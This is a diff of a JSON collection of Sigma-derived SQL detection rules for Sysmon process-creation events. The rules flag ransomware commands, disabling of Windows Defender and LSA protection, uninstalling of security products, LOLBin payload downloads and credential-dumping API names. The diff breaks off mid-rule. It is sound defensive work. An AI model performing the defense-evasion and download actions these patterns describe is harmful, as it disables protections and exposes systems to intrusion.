"level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sdbinst.exe' ESCAPE '\\' AND CommandLine LIKE '%.sdb%' ESCAPE '\\') AND NOT (CommandLine LIKE '%iisexpressshim.sdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') AND CommandLine LIKE '%11111111%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sdbinst_shim_persistence.yml" + "filename": "proc_creation_win_malware_rorschach_ransomware_activity.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip", - "id": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "status": "test", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "System File Execution Location Anomaly", + "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", + "status": "experimental", + "description": "Detects a Windows program executable started from a suspicious folder", + "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036" ], "falsepositives": [ - "Unknown" + "Exotic software" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%clipboard%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%i`%' ESCAPE '\\' OR CommandLine LIKE '%n`%' ESCAPE '\\' OR CommandLine LIKE '%v`%' ESCAPE '\\' OR CommandLine LIKE '%o`%' ESCAPE '\\' OR CommandLine LIKE '%k`%' ESCAPE '\\' OR CommandLine LIKE '%e`%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_system_exe_anomaly.yml" }, { - "title": "Potential Tampering With Security Products Via WMIC", - "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", + "title": "Suspicious Microsoft Office Child Process", + "id": "438025f9-5856-4663-83f7-52f878a70a50", "status": "test", - "description": "Detects uninstallation or termination of security products using the WMIC utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", + "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Legitimate administration" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\control.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\javaw.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msidb.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR Image LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_security_products.yml" + "filename": "proc_creation_win_office_susp_child_processes.yml" }, { - "title": "Disable Windows Defender AV Security Monitoring", - "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "title": "Abusing IEExec To Download Payloads", + "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", "status": "experimental", - "description": "Detects attackers attempting to disable Windows Defender using Powershell", - "author": "ok @securonix invrep-de, oscd.community, frack113", + "description": "Detects execution of the IEExec utility to download payloads", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml" + }, + { + "title": "LSA PPL Protection Disabled Via Reg.EXE", + "id": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", + "status": "experimental", + "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.010" ], "falsepositives": [ - "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND CommandLine LIKE '% /v RunAsPPL %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml" }, { - "title": "Uninstall Crowdstrike Falcon Sensor", - "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", - "status": "test", - "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "title": "PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE", + "id": "455b9d50-15a1-4b99-853f-8d37655a4c1b", + "status": "experimental", + "description": "Detects active directory enumeration activity using known AdFind CLI flags", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.discovery", + "attack.t1087.002" ], "falsepositives": [ - "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" + "Authorized administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" + "filename": "proc_creation_win_pua_adfind_enumeration.yml" }, { - "title": "HTML Help Shell Spawn", - "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", - "status": "test", - "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)", - "author": "Maxim Pavlunin", + "title": "Potential WinAPI Calls Via CommandLine", + "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "status": "experimental", + "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.001", - "attack.t1218.010", - "attack.t1218.011", "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1047", - "attack.t1566", - "attack.t1566.001", - "attack.initial_access", - "attack.t1218" + "attack.t1106" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE 'C:\\\\Windows\\\\hh.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\Windows\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\SysWOW64\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" + "filename": "proc_creation_win_susp_inline_win_api_access.yml" }, { - "title": "Terminal Service Process Spawn", - "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "title": "PowerShell Base64 Encoded Reflective Assembly Load", + "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", "status": "test", - "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (Image = '')))" - ], - "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" - }, - { - "title": "Potential Process Injection Via Msra.EXE", - "id": "744a188b-0415-4792-896f-11ddb0588dbc", - "status": "experimental", - "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", - "author": "Alexander McDonald", + "description": "Detects base64 encoded .NET reflective loading of Assembly", + "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - "attack.t1055" + "attack.t1027", + "attack.t1620" ], "falsepositives": [ - "Legitimate use of Msra.exe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE 